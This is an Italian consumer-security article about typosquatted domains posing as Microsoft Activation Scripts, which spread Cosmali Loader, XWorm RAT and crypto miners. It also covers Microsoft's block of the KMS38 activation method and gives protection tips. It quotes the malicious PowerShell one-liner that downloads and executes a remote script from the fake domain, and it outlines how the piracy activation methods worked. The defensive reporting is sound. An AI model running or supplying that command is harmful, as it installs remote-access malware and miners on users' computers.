Il pericolo invisibile degli attivatori non ufficiali
Se hai mai cercato un modo rapido per attivare Windows o Office senza pagare una licenza, sei potenzialmente a rischio. I cybercriminali sfruttano la ricerca di attivatori gratuiti per distribuire malware pericolosi come Cosmali Loader, che installa miner di criptovalute e trojan remoti capaci di controllare il tuo PC. La soluzione più sicura e definitiva è semplice: reinstalla Windows da zero con una licenza legittima per eliminare completamente ogni minaccia dal tuo sistema.
Il problema è più diffuso di quanto pensi. Milioni di utenti cercano strumenti per aggirare il sistema di attivazione di Microsoft, ma finiscono per scaricare codice malevolo senza neanche accorgersene. La buona notizia è che puoi proteggerti comprendendo come funziona l’attacco e quali precauzioni prendere.
Come funziona l’attacco: il typosquatting
I malintenzionati utilizzano una tecnica chiamata typosquatting, che sfrutta un semplice errore di battitura per reindirizzare gli utenti verso siti dannosi. Immagina di cercare il tool Microsoft Activation Scripts (MAS) e di digitare manualmente il comando PowerShell. Un dominio contraffatto come “get.activate.win” (notare la mancanza della ‘d’) sembra quasi identico all’originale, ma ti porta direttamente sui server dei criminali.
Quando copi e incolla il comando PowerShell sbagliato, scarichi ed esegui codice malevolo senza alcun segnale visibile di allarme. Il tuo antivirus potrebbe non rilevare nulla perché lo script viene eseguito tramite PowerShell, uno strumento legittimo di Windows che i criminali hanno imparato a sfruttare efficacemente.
La diffusione di questa minaccia è stata così ampia che diversi utenti hanno iniziato a ricevere avvisi sullo schermo avvertendoli del compromesso. Secondo le informazioni disponibili, un ricercatore di sicurezza è riuscito ad accedere al pannello di controllo dei criminali e ha inviato messaggi alle vittime, consigliando loro di reinstallare Windows immediatamente.
Quali malware vengono distribuiti
Una volta che il codice malevolo viene eseguito sul tuo PC, inizia a scaricare componenti pericolosi:
– Cosmali Loader: il trojan principale che scarica altri malware
– XWorm RAT (Remote Access Trojan): consente ai criminali di controllare il tuo PC da remoto, accedere ai tuoi file, rubare credenziali e dati sensibili
– Crypto miner: utilizza la potenza di calcolo del tuo processore e della GPU per estrarre criptovalute, rallentando drasticamente il tuo computer
Questi malware lavorano in silenzio. Potresti non accorgerti di nulla per settimane, mentre i tuoi dati vengono rubati e le tue risorse hardware vengono sfruttate dai criminali. Il tuo PC diventa parte di una botnet, una rete di computer compromessi controllati da hacker.
Microsoft ha chiuso la falla
Novembre 2025 ha segnato una svolta importante. Microsoft ha aggiornato Windows 11 e Windows 10 per bloccare definitivamente il metodo KMS38, lo script di attivazione più popolare utilizzato dai pirati informatici per anni. Questo aggiornamento ha reso inutili gli script MAS che molti utenti avevano precedentemente installato.
Gli utenti che avevano attivato Windows tramite questi metodi hanno iniziato a ricevere messaggi che li invitavano ad acquistare una licenza legittima. Microsoft ha semplicemente patchato il codice di Windows per rifiutare qualsiasi attivazione che mostri il comportamento anomalo tipico di questi exploit.
Questa mossa rappresenta un giro di vite significativo contro la pirateria software, soprattutto considerando che la fine del supporto mainstream a Windows 10 sta spingendo milioni di utenti a valutare l’upgrade a Windows 11. Le licenze Windows, tuttavia, sono diventate molto più accessibili economicamente e possono essere acquistate a prezzi ragionevoli da rivenditori legittimi.
Come proteggere il tuo PC
Se temi di aver scaricato malware da uno di questi attivatori contraffatti, ecco cosa puoi fare:
- Verifica i processi in esecuzione: Apri Task Manager (Ctrl+Maiusc+Esc) e cerca processi sospetti. Se vedi qualcosa di strano, annota il nome.
- Esegui una scansione antimalware: Utilizza Malwarebytes o Windows Defender in modalità offline per scansionare il sistema completo.
- Considera la reinstallazione: Se sospetti un compromesso serio, la soluzione più sicura è reinstallare Windows da zero utilizzando un supporto di installazione ufficiale e una licenza valida.
- Evita gli attivatori non ufficiali: Le licenze Windows sono convenienti e legali. Non vale la pena rischiare il tuo PC e i tuoi dati.
- Verifica sempre gli indirizzi: Se devi utilizzare qualsiasi tool, verifica attentamente l’indirizzo web e il dominio. Controlla due volte prima di eseguire comandi PowerShell.
- L’utente cerca MAS online e trova un risultato di ricerca o un link a un dominio typosquattato
- Copia un comando PowerShell come:
irm https://get.activate.win/checker.ps1 | iex - Il comando scarica e esegue uno script remoto tramite
Invoke-RestMethod(irm) eInvoke-Expression(iex) - Lo script scarica Cosmali Loader, che a sua volta deploya XWorm RAT e crypto miner
- Il malware si installa persistentemente nel sistema
Technical Deep Dive
Come funziona Microsoft Activation Scripts (MAS)
Microsoft Activation Scripts è una suite di script PowerShell open-source progettata per automatizzare l’attivazione di Windows 8, 10, 11 e Office utilizzando quattro metodi principali:
– HWID (Hardware ID): Crea un’attivazione basata sull’hardware del computer specifico
– KMS Emulation: Simula un server Key Management Service aziendale
– Ohook: Modifica il comportamento della verifica delle licenze di Office
– TSforge: Un metodo aggiuntivo per sistemi specifici
Il metodo KMS38, che è stato bloccato da Microsoft, funzionava sfruttando una logica errata nel codice locale di Windows. Invece di contattare i server Microsoft, creava un’attivazione offline simulando un server KMS aziendale buggato. Le aziende utilizzano KMS per attivare migliaia di PC collegandosi a un server interno, e le attivazioni scadono ogni 180 giorni richiedendo il rinnovo tramite la rete aziendale.
KMS38 era considerato il “gold standard” della pirateria di Windows perché era sicuro (totalmente open-source), facile da usare e permetteva l’installazione di tutti gli aggiornamenti ufficiali senza problemi.
L’attacco tramite typosquatting PowerShell
L’attacco moderno sfrutta PowerShell, lo strumento di scripting nativo di Windows, per eseguire codice remoto. Il flusso è:
Questo metodo è efficace perché PowerShell è un componente legittimo di Windows e gli antivirus spesso non bloccano script eseguiti tramite PowerShell se provengono da fonti apparentemente legittime.
Indicatori tecnici di compromissione
Se sospetti che il tuo PC sia stato compromesso da questi malware, cerca:
– Processi PowerShell in background che non hai avviato
– Connessioni di rete strane verso indirizzi IP sconosciuti
– Utilizzo anomalo della CPU o GPU anche quando il PC è inattivo
– File temporanei sospetti nelle cartelle AppData o Temp
– Voci di registro modificate relative all’attivazione di Windows
– Ritardi significativi nelle prestazioni del sistema
Patch Microsoft e implicazioni future
L’aggiornamento di novembre 2025 ha modificato il codice di validazione dell’attivazione locale di Windows per rifiutare specifiche date o comportamenti anomali tipici di KMS38. Poiché questa è una modifica locale al codice di Windows, non esiste un modo semplice per gli sviluppatori di MAS di aggirare il blocco senza accesso ai sorgenti di Windows stessi.
Microsoft probabilmente continuerà a inasprire le verifiche di attivazione nei prossimi aggiornamenti, rendendo sempre più difficile utilizzare metodi non ufficiali. Allo stesso tempo, le licenze Windows rimangono economicamente accessibili, eliminando la necessità economica di ricorrere a strumenti pirata.
Fonte: https://www.punto-informatico.it/malware-distribuito-tramite-attivatore-windows/
